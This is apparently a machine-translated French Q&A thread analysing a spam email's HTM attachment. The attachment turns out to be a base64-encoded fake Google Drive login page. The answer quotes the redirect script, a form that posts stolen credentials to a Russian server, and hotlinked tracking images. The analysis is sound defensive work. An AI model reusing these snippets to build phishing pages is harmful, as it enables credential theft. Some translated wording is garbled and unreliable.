web-dev-qa-db-fra.com

Vous avez un courrier spam avec une pièce jointe HTM, est le script nocif?

Aujourd'hui, j'ai reçu un email avec une pièce jointe HTM, le MTH contient le code ci-dessous:

<html>  
    <head>
        <script>
            var url = ""
            window.location.href= url;
        </script>
    </head>
</html>

La variable URL a été attribuée une valeur énorme de 247251 caractères, je pense que ce sont des caractères un peu déquis d'augmenter la longueur de l'URL.

Je n'ai intentionnellement pas écrit le contenu de l'URL juste pour éviter que je n'expose aucune menace de sécurité aux autres. Voici la pâte de la poubelle que je fais référence à .

Si j'ouvre cela dans n'importe quel navigateur Web, ce que tous les dommages peuvent faire?

attacksspamemail-spoofing
8
Kaushalendra Mishra

Qu'est-ce que c'est?

J'ai décodé votre "ordures". C'est le codage de base64 et est beaucoup trop grand pour placer ici. Voici le résultat décodé: http://pastebin.com/nbv4iy2s

Cela semble être une pièce jointe de la page de connexion de Google Drive. En fait, Tout est soulevé de Google Drive, à l'exception de quelques articles.

Ceci est une tentative de phishing.

Comme vous pouvez le constater à partir du numéro de ligne 2642, il essaie réellement d'envoyer les données à un serveur Web en Russie:

<form action="hxxp://www.gladiolusfashion.ru/js/fancybox/country.php" id="signup" method="post" name="signup">

Il suffit d'essayer de voler vos détails de votre compte Google. Ceci est une tentative de phishing à la main-d'œuvre.

Cependant, il y a un autre problème potentiel: une image à chaud de l'U.K:

Confirm your identity.<img align="right" border="0" height="33" src="hxxp://www.bountifulbreast.co.uk/images/100Secure.jpg" width="83"></h1>

Ce que cela est probable, c'est alerter le propriétaire de ce site Web qu'une tentative a été faite pour accéder à cette image particulière. Si les propriétaires de ces sites Web sont les mêmes, votre adresse IP et votre tentative d'accès peuvent alors être enregistrées. Cela pourrait les aider à déterminer l'efficacité de leurs attaques de phishing. "Combien de personnes voient ceci vs. Combien de chute pour cela?"

Il est également possible que le serveur Web pour les images soit également compromis. Il peut être soit compromis, soit juste à chaud. Il est difficile de dire.

En haut, pour éviter d'alerter la détection de phishing à lien hot-lien de Google, les phishers n'avaient pas d'autre choix que de lier à chaud vers un site Web d'icônes gratuit pour lui donner l'apparition de la légitimité. Vous pouvez voir cela sur les lignes 2585 et 2586:

<link rel="shortcut icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">
<link rel="Apple-touch-icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">

Enfin, lorsque vous soumettez des données, il vous envoie à une fausse page indiquant que le fichier demandé n'existe pas. (Pastebin)

TL; DR BAISSON

Cette tentative de phishing essaie de faire quelques choses:

  1. Lors de l'ouverture de la pièce jointe, il tentera de vous rediriger vers une page avec une fausse connexion Google Drive et essayez de vous tromper dans vos références.
  2. Si vous étiez assez stupide pour entrer vos informations d'identification, ils seront soumis à un script PHP situé sur un serveur en Russie.
  3. Une fois soumis, Vous recevrez une fausse page de connexion (Pastebin de ceci) Vous dire que le fichier n'existe pas.

Conclusion

Ne vous inquiétez pas l'ouverture. Il essaie de vous amener à entrer vos informations d'identification.

13
Mark Buffalo